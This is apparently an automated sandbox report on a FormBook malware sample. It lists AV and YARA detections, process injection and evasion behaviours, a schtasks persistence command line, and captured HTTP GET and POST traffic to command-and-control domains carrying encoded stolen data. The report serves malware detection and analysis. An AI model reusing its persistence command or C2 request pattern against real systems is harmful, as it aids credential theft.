Loading ...

Play interactive tourEdit tour

Analysis Report pZTgBSxb0oe9deC.exe

Overview

General Information

Sample Name:pZTgBSxb0oe9deC.exe
Analysis ID:286339
MD5:ae816597f9990952c8b6f523b64f24c9
SHA1:f6a8209eebb95669f4c1223d4abe02888bf54173
SHA256:98605f399585016ae41edcfbc496fa98225ad51928b26b9dff6261fbc09d7d7f
Tags:formbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • pZTgBSxb0oe9deC.exe (PID: 5860 cmdline: 'C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe' MD5: AE816597F9990952C8B6F523B64F24C9)
    • schtasks.exe (PID: 4636 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' /XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • pZTgBSxb0oe9deC.exe (PID: 1548 cmdline: {path} MD5: AE816597F9990952C8B6F523B64F24C9)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 5952 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c27a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18349:$sqlite3step: 68 34 1C 7B E1
    • 0x1845c:$sqlite3step: 68 34 1C 7B E1
    • 0x18378:$sqlite3text: 68 38 2A 90 C5
    • 0x1849d:$sqlite3text: 68 38 2A 90 C5
    • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c27a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 8 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c27a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18349:$sqlite3step: 68 34 1C 7B E1
        • 0x1845c:$sqlite3step: 68 34 1C 7B E1
        • 0x18378:$sqlite3text: 68 38 2A 90 C5
        • 0x1849d:$sqlite3text: 68 38 2A 90 C5
        • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
        5.2.pZTgBSxb0oe9deC.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.pZTgBSxb0oe9deC.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b47a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' /XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' /XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe' , ParentImage: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe, ParentProcessId: 5860, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' /XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp', ProcessId: 4636

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: pZTgBSxb0oe9deC.exeAvira: detected
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\pRVJhcAjvJZLI.exeAvira: detection malicious, Label: TR/Kryptik.hjvbc
          Multi AV Scanner detection for domain / URLShow sources
          Source: http://www.glowtey.comVirustotal: Detection: 7%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\pRVJhcAjvJZLI.exeVirustotal: Detection: 34%Perma Link
          Source: C:\Users\user\AppData\Roaming\pRVJhcAjvJZLI.exeReversingLabs: Detection: 27%
          Multi AV Scanner detection for submitted fileShow sources
          Source: pZTgBSxb0oe9deC.exeVirustotal: Detection: 34%Perma Link
          Source: pZTgBSxb0oe9deC.exeReversingLabs: Detection: 27%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.202381231.0000000004158000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.243339890.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\pRVJhcAjvJZLI.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: pZTgBSxb0oe9deC.exeJoe Sandbox ML: detected
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49746
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49752
          Source: global trafficHTTP traffic detected: GET /k8b/?abg0n=0v5M9lAxeGs3Z2wSqhBRyQiK1iT/MtB56uN4ob1ruqxgc5JDlvFtl3BValt9kiEa9zMj&mVJl9j=h2Jdsdr8W25Tg0Np HTTP/1.1Host: www.messi-and-ronaldo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?mVJl9j=h2Jdsdr8W25Tg0Np&abg0n=6dMkGDfpk1r0Gmr8hQYTBKv4S6+5Z6uHlrQcjV8Ea1YOfXcWOZvOwazRs+Dk1aCo4f0j HTTP/1.1Host: www.westhillsterracepdx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?mVJl9j=h2Jdsdr8W25Tg0Np&abg0n=2gApIl2Au4n1uRFWrzVZLEXy//w6Ybr6Vv4mKuths8NfzmG+Z+iGg3adnddbL4twR+EY HTTP/1.1Host: www.7sat.asiaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: RMI-FITECHFR RMI-FITECHFR
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.messi-and-ronaldo.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.messi-and-ronaldo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.messi-and-ronaldo.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 38 4e 31 32 6a 41 63 51 54 47 41 43 41 6e 39 53 77 47 63 55 6c 6d 53 32 32 44 69 73 4a 50 5a 65 74 4a 63 71 35 5a 59 31 76 49 4e 4b 59 4b 6c 68 6c 50 41 45 67 53 45 34 5a 45 52 62 30 69 41 66 68 44 4d 79 30 79 69 53 31 68 57 64 69 42 5a 38 59 73 74 52 70 69 6d 42 66 4d 44 44 38 42 52 4d 77 4c 55 44 47 78 62 4a 31 5a 71 56 74 32 36 65 59 43 53 39 43 74 4e 76 37 4a 41 35 76 49 39 49 70 41 76 4d 73 31 34 63 6c 32 57 51 4d 67 32 67 62 44 58 53 64 76 71 66 48 64 54 72 58 50 6d 39 4e 4f 6b 76 74 65 58 31 72 73 76 2d 65 35 39 4f 61 55 44 47 63 52 5a 4e 6c 6b 4a 72 4d 30 38 64 6b 48 75 68 6e 2d 28 6b 30 66 6c 4d 66 2d 42 6a 6e 30 70 30 4f 56 6d 74 78 6f 30 76 75 45 64 75 7a 2d 74 70 69 4b 7e 74 75 42 54 72 31 37 31 4c 53 6e 52 66 62 6a 64 6f 65 32 4a 4f 58 32 34 52 68 66 4b 54 4f 61 78 78 47 55 6d 68 71 56 48 5f 54 65 75 53 50 63 75 70 67 30 6a 65 52 2d 35 38 28 68 42 41 6a 73 37 74 31 5f 69 4b 4e 4c 28 5a 31 78 47 6f 6a 41 61 68 54 58 39 74 74 70 54 55 47 31 4a 30 42 36 35 74 67 31 53 6b 30 4b 35 6a 37 5f 4e 38 70 6a 5a 34 71 31 6d 44 63 2d 6f 6d 67 4b 66 66 64 65 42 51 70 75 42 50 56 6f 72 6a 5a 58 74 35 28 32 37 42 61 4a 6c 6f 70 49 47 49 70 57 4d 34 4f 75 53 72 73 4a 46 30 56 44 53 30 70 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: abg0n=8N12jAcQTGACAn9SwGcUlmS22DisJPZetJcq5ZY1vINKYKlhlPAEgSE4ZERb0iAfhDMy0yiS1hWdiBZ8YstRpimBfMDD8BRMwLUDGxbJ1ZqVt26eYCS9CtNv7JA5vI9IpAvMs14cl2WQMg2gbDXSdvqfHdTrXPm9NOkvteX1rsv-e59OaUDGcRZNlkJrM08dkHuhn-(k0flMf-Bjn0p0OVmtxo0vuEduz-tpiK~tuBTr171LSnRfbjdoe2JOX24RhfKTOaxxGUmhqVH_TeuSPcupg0jeR-58(hBAjs7t1_iKNL(Z1xGojAahTX9ttpTUG1J0B65tg1Sk0K5j7_N8pjZ4q1mDc-omgKffdeBQpuBPVorjZXt5(27BaJlopIGIpWM4OuSrsJF0VDS0pg).
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.messi-and-ronaldo.comConnection: closeContent-Length: 185371Cache-Control: no-cacheOrigin: http://www.messi-and-ronaldo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.messi-and-ronaldo.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 38 4e 31 32 6a 46 6f 45 44 6d 56 5a 46 52 6c 54 28 32 4d 4d 79 32 6a 76 79 42 6e 71 4b 64 4a 6b 69 4f 73 45 35 59 70 79 69 71 31 55 54 4b 56 68 6e 4b 30 44 70 53 45 37 4e 30 52 59 6d 53 63 72 37 55 49 71 30 32 36 6f 31 68 75 63 37 53 42 35 59 38 74 34 70 43 69 39 4f 61 76 49 38 48 51 6d 33 70 34 62 44 78 58 4a 6f 5a 79 54 78 43 6d 46 66 47 4c 39 4c 35 74 6d 35 49 59 38 76 36 70 61 70 6d 6e 2d 37 41 5a 36 69 41 65 62 44 41 72 5f 66 53 66 6e 48 76 57 59 4c 36 44 30 4b 63 44 30 41 71 78 53 77 72 6a 71 31 4d 32 5f 4a 36 31 6f 4c 31 48 5f 51 67 4a 7a 6c 6e 59 51 53 6d 6f 4d 67 45 71 70 69 50 69 44 38 4e 4a 4b 62 4a 68 72 74 58 42 4a 49 56 57 53 70 70 45 4b 71 56 68 33 30 39 56 35 76 50 66 56 74 30 37 6e 36 71 45 69 52 30 64 74 5a 6a 73 4d 55 52 74 56 64 43 4d 4a 69 64 48 34 54 71 78 61 45 55 6d 6c 69 78 7a 48 42 35 66 65 59 74 28 4a 7e 6b 61 61 53 75 56 33 79 44 31 4d 6e 49 33 65 79 50 75 4f 48 62 76 68 69 45 57 5f 6b 33 54 65 57 58 38 7a 74 6f 28 4c 47 31 49 50 42 37 35 4c 68 48 75 6b 6c 4c 59 76 37 63 6c 77 72 6a 5a 66 6f 6c 57 42 48 38 4d 32 67 4b 48 66 63 76 78 36 72 64 52 50 52 37 7a 38 5a 31 46 35 34 47 37 42 51 5a 6b 39 71 49 4c 44 74 55 56 34 46 76 66 52 34 70 4e 6e 5a 67 33 4d 37 63 4c 4c 52 41 65 5f 6a 53 45 6f 4c 5f 38 30 6e 68 35 32 4e 41 65 4d 6c 78 51 6c 7a 44 42 55 61 65 72 4e 66 4e 4f 39 53 68 71 34 74 56 79 41 75 6e 56 4c 6e 68 28 33 54 2d 6d 70 63 38 51 58 56 63 41 6a 67 52 6b 74 64 6b 65 78 32 33 6c 6a 7e 4e 61 30 42 31 66 52 42 56 55 5a 68 59 50 4f 56 52 4b 69 35 49 6c 54 7a 6d 78 4d 54 55 34 6f 63 56 45 44 47 57 73 49 4f 7a 7a 6b 38 78 67 68 41 62 61 48 74 6a 4e 69 49 68 50 69 64 63 36 6c 6f 78 62 4e 61 55 61 57 66 6c 33 53 77 37 48 78 77 34 62 33 41 43 4d 4d 34 4e 5a 6a 41 35 68 4f 73 4f 70 70 68 67 45 38 54 6a 54 79 48 47 4c 30 64 4a 28 73 32 69 56 2d 4f 71 57 56 6a 4f 45 55 4f 48 49 32 45 39 75 6d 78 6f 6c 76 48 4f 37 72 76 55 51 31 28 31 64 41 75 4d 65 6e 37 6d 4b 52 50 30 38 56 31 31 47 53 43 50 37 67 69 6a 59 41 63 42 54 79 67 68 37 77 31 6b 68 51 70 4b 43 70 46 7a 43 31 28 62 48 6e 56 69 33 52 74 48 72 45 4d 65 6c 39 77 42 28 6e 7e 71 6c 49 36 74 62 35 59 61 51 36 6a 52 56 35 33 64 73 43 66 47 79 6e 59 32 79 30 6f 56 4b 37 31 4e 66 48 4b 46 30 52 56 2d 55 72 7e 73 6c 69 28 35 74 46 33 31 6f 52 4c 31 4b 54 6f 53 59 62 63 6a 62 72 6a 48 32 59 4e 48 28 76 73 75 51 75 62 58 43 53 32 61 70 55 68 71 58 5a 56 64 31 31 47 71 33 38 4a 74 45 75 66 76 61 68 45 31 63 72 51 5f 31 4b 4a 30 78 4f 78 54 46 75 38 2d 32 6c 32 39 64 66 33 55 41 61 77 6c 56 34 50 41 7a 43 58 6c 79 54 55 72 77 72 41 70 65 4
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.westhillsterracepdx.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.westhillsterracepdx.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.westhillsterracepdx.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 79 5f 41 65 59 6d 4c 61 6c 6e 28 71 47 6d 53 30 33 30 70 58 58 74 71 66 46 59 65 71 54 4a 61 6d 7e 4f 42 37 32 31 73 5a 57 47 4d 5f 51 57 74 50 65 36 65 34 28 65 69 79 38 63 6a 57 78 34 43 46 6c 35 41 68 32 59 78 65 38 6a 66 7a 63 4f 56 72 6d 4c 70 38 5a 4f 7a 56 43 63 36 63 44 32 4f 73 49 6c 68 4e 71 42 66 30 4e 6c 37 34 64 6a 71 42 37 4d 56 31 38 49 59 43 7e 59 54 2d 33 33 6d 72 77 45 50 68 61 77 6b 49 35 76 4a 31 36 78 34 61 4b 5f 76 38 4e 42 65 73 51 52 6e 31 6e 55 73 59 53 6b 52 38 79 69 79 65 42 47 35 4a 78 47 42 56 66 79 31 55 66 4a 6b 72 43 45 33 45 45 6b 38 7a 54 68 73 43 42 72 56 62 6c 6d 55 32 59 74 46 46 52 52 53 43 72 62 46 54 4d 45 34 68 43 36 7e 32 31 67 6f 44 65 38 4b 6d 70 61 6b 69 50 7a 4d 41 78 49 35 79 66 65 7a 4c 76 68 73 63 44 42 79 43 4b 63 76 36 7a 30 74 62 47 33 31 72 36 72 4f 36 39 67 73 66 28 66 72 69 30 35 64 7a 4c 70 31 67 53 33 79 70 74 56 75 67 4c 30 41 30 76 6d 76 4f 4c 4d 77 42 32 2d 79 5f 6e 49 4a 5f 56 5f 4a 33 5a 73 44 42 75 4f 65 69 7e 38 42 58 63 61 47 71 43 5a 77 31 4c 39 6b 63 33 44 58 68 50 34 44 71 36 75 64 32 6e 5f 66 7a 41 66 6a 6f 43 55 58 64 65 71 35 6d 61 78 77 35 6a 78 45 38 75 55 51 4f 79 6f 4e 55 48 41 6f 5f 65 79 78 6d 51 62 30 50 50 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: abg0n=y_AeYmLaln(qGmS030pXXtqfFYeqTJam~OB721sZWGM_QWtPe6e4(eiy8cjWx4CFl5Ah2Yxe8jfzcOVrmLp8ZOzVCc6cD2OsIlhNqBf0Nl74djqB7MV18IYC~YT-33mrwEPhawkI5vJ16x4aK_v8NBesQRn1nUsYSkR8yiyeBG5JxGBVfy1UfJkrCE3EEk8zThsCBrVblmU2YtFFRRSCrbFTME4hC6~21goDe8KmpakiPzMAxI5yfezLvhscDByCKcv6z0tbG31r6rO69gsf(fri05dzLp1gS3yptVugL0A0vmvOLMwB2-y_nIJ_V_J3ZsDBuOei~8BXcaGqCZw1L9kc3DXhP4Dq6ud2n_fzAfjoCUXdeq5maxw5jxE8uUQOyoNUHAo_eyxmQb0PPQ).
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.westhillsterracepdx.comConnection: closeContent-Length: 185371Cache-Control: no-cacheOrigin: http://www.westhillsterracepdx.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.westhillsterracepdx.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 79 5f 41 65 59 6a 76 4f 6e 58 4c 33 51 46 32 31 33 67 4e 50 42 64 62 43 55 50 6d 31 61 2d 7e 59 7a 2d 74 72 32 31 63 46 61 6c 45 74 56 33 64 50 50 73 71 5f 7a 65 69 39 7e 63 6a 56 31 34 50 79 36 37 78 73 32 5a 31 6e 38 6a 48 77 48 5f 6c 75 6c 62 70 72 61 75 28 48 41 63 76 59 44 30 4c 47 49 47 4e 56 76 42 54 30 44 31 7a 36 57 6d 32 73 74 64 5a 77 38 34 30 39 38 63 48 64 33 46 6a 65 28 47 7a 44 64 7a 67 47 76 4f 38 35 32 52 6f 79 50 73 66 33 49 52 37 6d 4e 6e 36 7a 34 6e 35 66 56 68 78 65 38 44 79 64 4a 56 4a 58 30 45 70 33 5a 44 68 70 61 59 30 56 43 48 47 35 4a 79 63 6d 58 69 6f 61 48 5a 78 39 74 79 73 34 55 38 46 64 56 54 37 36 6e 37 56 38 54 30 49 36 56 37 43 5a 30 6d 73 31 62 64 53 64 75 72 59 2d 48 6d 77 38 79 62 30 78 54 2d 6a 30 69 43 38 48 4a 79 4b 4b 4a 65 43 52 39 30 74 77 45 33 31 52 30 50 43 4f 76 44 41 55 34 66 61 79 6f 71 74 67 49 34 5a 57 47 55 57 31 6a 55 6d 31 4f 45 63 34 6e 32 7e 78 4d 71 67 65 69 35 62 41 36 34 4a 38 56 35 31 4b 5a 73 43 79 75 50 66 5f 77 74 6c 58 64 4c 6d 39 57 61 59 70 4e 39 6c 65 77 53 6e 6e 41 72 58 36 36 75 31 32 6f 75 76 64 41 6f 66 6f 55 52 54 43 65 4c 35 6d 58 68 77 35 6c 78 45 76 39 47 64 42 79 59 52 50 50 7a 4a 71 5a 6d 46 32 59 5a 73 66 56 61 52 63 28 75 6c 6b 6d 42 28 50 4e 39 79 64 45 47 76 6f 78 7a 67 54 6d 46 44 39 6e 48 58 76 43 45 58 47 53 50 78 57 59 71 51 6e 49 72 71 57 34 52 65 51 6e 2d 28 32 33 4a 30 41 74 70 47 44 70 56 43 61 69 6a 42 44 61 4b 45 53 64 43 6a 6a 62 6c 4e 5f 6d 73 35 73 73 2d 67 47 57 44 45 46 39 35 6f 44 63 71 7e 62 48 30 6d 44 45 49 30 59 6e 42 37 72 43 34 35 79 46 34 39 31 56 55 47 6b 69 61 58 63 65 39 6a 36 71 63 7a 63 45 4b 50 5a 31 6b 7e 5f 58 5f 6b 49 51 49 31 71 47 44 6c 5a 65 64 77 49 74 74 62 73 70 6e 64 4d 6a 70 32 68 6d 36 33 44 50 49 5a 63 59 63 6d 75 78 70 59 47 59 45 52 35 74 2d 4b 6c 53 47 66 62 53 7a 76 69 30 5f 37 6d 61 62 66 61 71 30 7e 59 77 32 66 38 6d 52 45 74 78 4c 65 77 74 55 78 4d 77 51 44 30 71 52 66 54 4a 6e 70 77 50 37 46 75 4b 77 75 70 73 5f 52 62 6d 6c 55 78 72 6a 50 71 4d 70 30 66 55 50 49 76 44 4c 45 6b 4f 61 30 6d 54 4c 51 33 57 73 34 4b 59 38 53 42 39 6d 6c 36 38 74 68 30 69 31 79 73 71 33 48 52 72 79 42 62 6b 48 28 39 44 36 4c 57 4a 39 78 44 41 6d 38 33 66 36 7a 41 37 36 69 62 4c 59 46 71 62 32 31 74 67 67 55 54 50 75 71 54 62 76 53 6c 6a 7a 47 5a 76 42 61 65 4c 7a 70 57 32 54 74 4d 30 58 32 51 4c 75 59 50 34 39 71 77 79 62 78 46 39 41 31 7a 76 55 46 66 61 65 42 47 4d 73 52 42 57 6b 74 33 76 42 4b 72 33 78 4f 45 58 45 78 6d 62 50 56 57 67 6e 72 32 47 6f 47 64 6e 59 4d 41 66 70 33 51 31 41 64 6b 6e 6
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.7sat.asiaConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.7sat.asiaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.7sat.asia/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 7e 43 4d 54 57 41 79 57 73 72 28 70 33 44 34 72 37 7a 6b 42 63 52 62 68 77 4f 52 6f 61 59 6a 72 50 70 35 6a 5a 74 70 5f 6a 75 74 70 7a 33 71 64 55 75 36 66 7a 67 50 64 77 4e 35 6a 4a 72 78 30 41 37 6b 51 4b 47 4b 70 46 59 41 48 31 41 28 42 50 61 4e 69 45 36 71 6e 55 4b 72 6d 58 7a 5a 65 75 62 39 4b 48 41 4e 71 4b 5f 65 4b 45 6d 62 56 53 4b 64 6f 36 38 79 51 58 32 7a 6b 4d 44 43 66 73 68 66 4c 38 44 5a 72 48 52 78 41 53 41 4a 36 61 54 4e 78 48 74 7e 78 55 48 62 7a 64 68 42 5a 59 30 55 36 49 2d 6a 78 70 5f 37 42 78 